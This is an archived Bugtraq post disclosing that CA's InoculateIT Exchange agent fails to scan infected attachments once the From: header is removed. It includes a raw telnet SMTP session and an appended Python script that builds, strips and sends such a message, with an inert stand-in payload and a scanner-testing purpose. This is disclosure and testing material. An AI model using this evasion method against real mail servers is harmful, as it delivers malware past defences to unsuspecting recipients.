Bugtraq mailing list archives
CA's InoculateIT Agent for Exchange Server
From: Hugo Caye <Hugo () MICMAC COM BR>
Date: Fri, 10 Nov 2000 16:29:23 -0200
Hi, I'm new on the list; this is my first message.

CA's InoculateIT Agent for Exchange Server cannot detect some messages that have had their SMTP headers changed. In October 1999 I reported it to the local CA support office, but even now nothing has been done. The guys at inoc-nt () ca com seem to ignore my messages.

The bug can easily be demonstrated by telnetting to tcp/25 on an Exchange Server with the IMC (the MS SMTP connector/service). I simply change some SMTP headers and CA's AVEX Agent does not even open the attached file that is infected. It is not a signature issue, since I can also send CA's virtest.com sample file. Any file can be sent, since the AVEX Agent doesn't recognize the message as having an attached file.

It can be done like this:

1. Get a message containing any infected, MIME-encoded attached file. I simply filtered it out via EX to C:\TurfDir, sending from outside to EX;

2. Edit the file (I used MS Notepad.exe) and just remove the "From: ..." line from the SMTP header. Something like this:

==>> Remove this line: From: Test <Test () abc com br>
To: Hugo Caye <Hugo () xyz com br>
Subject: Test
Date: Mon, 23 Oct 2000 10:59:53 -0200
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2650.21)
Content-Type: application/x-msdownload; name="Fix2001.exe"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="Fix2001.exe"

TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAsAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4g
aW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABjDAXbJ21riCdta4gnbWuIJ21riGRta4ikcWWIJm
1riFJpY2gnbWuIAAAAAAAAAABQRQAATAEDAJ/L0zcAAAAAAAAAAOAADwELAQUMABoAAAAA
AgAAAAAAABAAAAAQAAAAMAAA...
<<== Removed the rest here

3. Copy the Notepad content to the clipboard;

4. Issue the "telnet your_exsrvr 25" command:

220 aaa.xyz.com.br ESMTP Server (Microsoft Exchange Internet Mail Service 5.5.2650.21) ready
helo
250 OK
mail from:<>
250 OK - mail from <>
rcpt to:<hugo () xyz com br>
250 OK - Recipient <hugo () xyz com br>
data
354 Send data. End with CRLF.CRLF
==>> Here, paste from the clipboard (Win2K, just a mouse right-click). Something like this:
To: Hugo Caye <Hugo () xyz com br>
Subject: Test
Date: Mon, 23 Oct 2000 10:59:53 -0200
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2650.21)
Content-Type: application/x-msdownload; name="Fix2001.exe"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="Fix2001.exe"

TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAsAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4g
aW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABjDAXbJ21riCdta4gnbWuIJ21riGRta4ikcWWIJm
1riFJpY2gnbWuIAAAAAAAAAABQRQAATAEDAJ/L0zcAAAAAAAAAAOAADwELAQUMABoAAAAA
AgAAAAAAABAAAAAQAAAAMAAA...
<<== Removed...
....AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
.
250 OK
quit
221 closing connection

5. Message sent; CA's Agent will not detect the infected file.

This is one manner of exploiting the Agent. There are at least two more holes. I'm not talking about the weaknesses of embedded messages and server-based rules, both big holes recognized by CA.

How can this bug become public, and CA recognize it and _fix_ it?

Hugo Caye
    O__
 ---- c/ /'_
--- (*) \(*)
-- ~~~~~~~~
ccna ccda mcne³ ncip mcse cne5
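The procedure in steps 1 to 5 above, as an added example in Python that is not part of the original post and is not code from CA or Microsoft: it builds a single-part message shaped like the one in the post, deletes the From: header the way the Notepad step does, shows that a scanner which parses the MIME structure still finds the attachment either way, and emits the client side of the SMTP session with the null reverse path and proper dot-stuffing. The mailbox addresses are reconstructed from the archive's obfuscated forms, the HELO name is arbitrary, and the attachment bytes are a constructed inert stand-in (the post used CA's virtest.com sample, which is not reproduced here); `send_raw` is the same session via `smtplib` for use against a test server and is not exercised offline.

```python
import base64
import email
import email.policy
import re
import smtplib

# Constructed stand-in for the attachment body: inert bytes that merely begin
# with an MZ header, as the base64 in the post decodes to.  The post used
# CA's own virtest.com sample, which is not reproduced here.
PAYLOAD = (b"MZ\x90\x00\x03\x00\x00\x00\x04\x00\x00\x00\xff\xff\x00\x00"
           + b"This program cannot be run in DOS mode.\r\n$" + b"\x00" * 24)


def build_message(filename, body, with_from=True):
    """Build the single-part message from the post: RFC 822 headers followed by
    a base64 application/x-msdownload body.  Addresses are reconstructed from
    the archive's obfuscated ones (assumption), not real mailboxes."""
    lines = []
    if with_from:
        lines.append(b"From: Test <Test@abc.com.br>")
    lines += [
        b"To: Hugo Caye <Hugo@xyz.com.br>",
        b"Subject: Test",
        b"Date: Mon, 23 Oct 2000 10:59:53 -0200",
        b"MIME-Version: 1.0",
        b"X-Mailer: Internet Mail Service (5.5.2650.21)",
        b'Content-Type: application/x-msdownload; name="%s"' % filename.encode(),
        b"Content-Transfer-Encoding: base64",
        b'Content-Disposition: attachment; filename="%s"' % filename.encode(),
        b"",                                    # blank line ends the headers
    ]
    b64 = base64.b64encode(body)
    lines += [b64[i:i + 70] for i in range(0, len(b64), 70)]  # 70-col lines as in the post
    return b"\r\n".join(lines) + b"\r\n"


def strip_header(raw, name):
    """The Notepad step: delete one header (with any folded continuation lines)
    from the header block and leave the body byte-for-byte untouched."""
    head, sep, body = raw.partition(b"\r\n\r\n")
    kept, skipping = [], False
    for line in head.split(b"\r\n"):
        if line[:1] in (b" ", b"\t"):          # continuation of the previous header
            if not skipping:
                kept.append(line)
            continue
        skipping = line.lower().startswith(name.lower().encode() + b":")
        if not skipping:
            kept.append(line)
    return b"\r\n".join(kept) + sep + body


def extract_attachments(raw):
    """What a scanner that parses the MIME structure sees: every attachment as
    (filename, content type, decoded bytes).  From: plays no part in this, so
    removing it changes nothing here."""
    msg = email.message_from_bytes(raw, policy=email.policy.default)
    found = []
    for part in msg.walk():
        if part.is_multipart():
            continue
        filename = part.get_filename()
        if filename is None and part.get_content_disposition() != "attachment":
            continue
        found.append((filename, part.get_content_type(),
                      part.get_payload(decode=True)))
    return found


def smtp_commands(rcpt, raw, helo="test"):
    """Client side of the session in the post: null reverse path, one recipient,
    the raw message, then the terminating '.'.  Any body line that itself starts
    with '.' is dot-stuffed so the server does not take it as end of data."""
    body = raw if raw.endswith(b"\r\n") else raw + b"\r\n"
    stuffed = re.sub(rb"(^|\r\n)\.", rb"\1..", body)
    return [
        b"HELO " + helo.encode(),
        b"MAIL FROM:<>",
        b"RCPT TO:<" + rcpt.encode() + b">",
        b"DATA",
        stuffed + b".",
        b"QUIT",
    ]


def send_raw(host, rcpt, raw, port=25):
    """Same session over the wire via smtplib (not run offline).  An empty
    sender makes smtplib emit MAIL FROM:<> exactly as typed in the post."""
    with smtplib.SMTP(host, port) as s:
        s.helo("test")
        return s.sendmail("", [rcpt], raw)


if __name__ == "__main__":
    original = build_message("Fix2001.exe", PAYLOAD)
    stripped = strip_header(original, "From")
    for label, raw in (("with From:", original), ("without From:", stripped)):
        for name, ctype, data in extract_attachments(raw):
            print(f"{label}: {name} ({ctype}, {len(data)} bytes, starts {data[:2]!r})")
    for cmd in smtp_commands("hugo@xyz.com.br", stripped)[:4]:
        print("C:", cmd.decode())
```

The check this supports against any mail gateway scanner, not only the one in the post: take one message whose attachment the scanner is known to catch, resend it with individual headers removed or reordered (From: here, but also Date:, X-Mailer: and the rest), and confirm each variant is still scanned. `extract_attachments` is the reference behaviour: the attachment is identified by Content-Type and Content-Disposition alone, so no envelope or header outside the MIME structure should decide whether the body gets opened.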